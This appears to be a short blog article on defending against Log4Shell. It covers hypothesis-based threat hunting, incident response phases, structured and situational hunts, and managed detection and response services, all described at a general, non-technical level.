One year after Log4Shell was first made public, this open-source logging library remains a prime target for malicious actors. Given its widespread usage and prevalence, organizations must remain diligent when patching or re-deploying vulnerable systems.
For effective security, a proactive strategy must be used that integrates preventative controls with detection and response mechanisms. Automated tools may detect threats, but the human threat hunter will be the best defense against advanced threats.
Hypothesis-Based Hunting
Hypothesis-Based Hunting is a security strategy that can keep you ahead of Log4Shell by detecting adversary behavior before they have the capacity to execute code. Threat hunters build and test hypotheses based on threat intelligence, personal experience with the actor, and careful observations.
Hypothesis-based investigations differ from detection-based hunts in that they require hunters to collect data from various endpoints within an environment and then process that information before testing it against predefined hypotheses.
Hunters should be cognizant of any biases or bad analytical habits which might influence their hypothesis formulation. For instance, if they have previously worked in a government setting that focused on specific threats, it may be easy for them to prejudge an environment.
Incident Response
The incident response process aims to minimize damage and time to recovery for an organization. It includes preparation, detection and analysis, containment and eradication.
Preparing involves creating an incident response plan, policies and procedures as well as roles and responsibilities for your team. Doing this helps keep them organized and allows them to quickly respond to incidents.
Detection and analysis are essential steps in uncovering any malicious activity on your network. They also allow you to gather evidence for further in-depth investigations.
At this stage of incident response, teams should also document and retain evidence collected to build a case for prosecution. This is one of the most crucial elements of incident handling that often goes overlooked, but should never be neglected.
Threat Hunting
Threat hunting is a proactive methodology and technology designed to keep organizations ahead of cyber-attackers. Security teams use this technique to detect threats that may have evaded traditional tools like SIEMs or UEBA solutions.
Data enrichment helps identify suspicious behavior that could indicate an attacker’s intent or ability to carry out an attack. Human logic also plays a role, searching for patterns in data that cannot be detected using automated tools.
Structured Hunts: Structured hunts are designed around indicators of attack (IoA) and tactics, techniques and procedures (TTPs). This type of investigation searches for patterns both before and after detection to help identify the threat actor.
Situational Hunts: Situational hunts are designed to take advantage of a threat actor’s activities, such as knowledge of previous attacks. This type of investigation typically begins with a risk assessment and utilizes external attack data to detect trending TTPs.
The objective of a successful threat hunt is to collect vital information that can be utilized for responding, prioritizing, analyzing and storing for later. Doing this helps prevent similar attacks in the future and enhance security measures accordingly.
MDR
As attack vectors and hackers become more proficient, organizations require an ever-evolving resource of people and technology to stay ahead. Unfortunately, this can prove challenging for many companies–particularly small and medium-sized ones.
Managed detection and response (MDR) services provide the solution. This approach integrates an extended detection and response (XDR) or endpoint detection and response (EDR) platform with a team of experts who monitor networks, logs and events in real-time to detect threats.
MDR providers can respond rapidly to cybersecurity incidents, helping organizations reduce the time in which malicious actors can exploit vulnerabilities. MDR provides 24/7 monitoring, threat hunting, alert prioritization and remediation with service level agreements (SLAs), all backed by SLAs.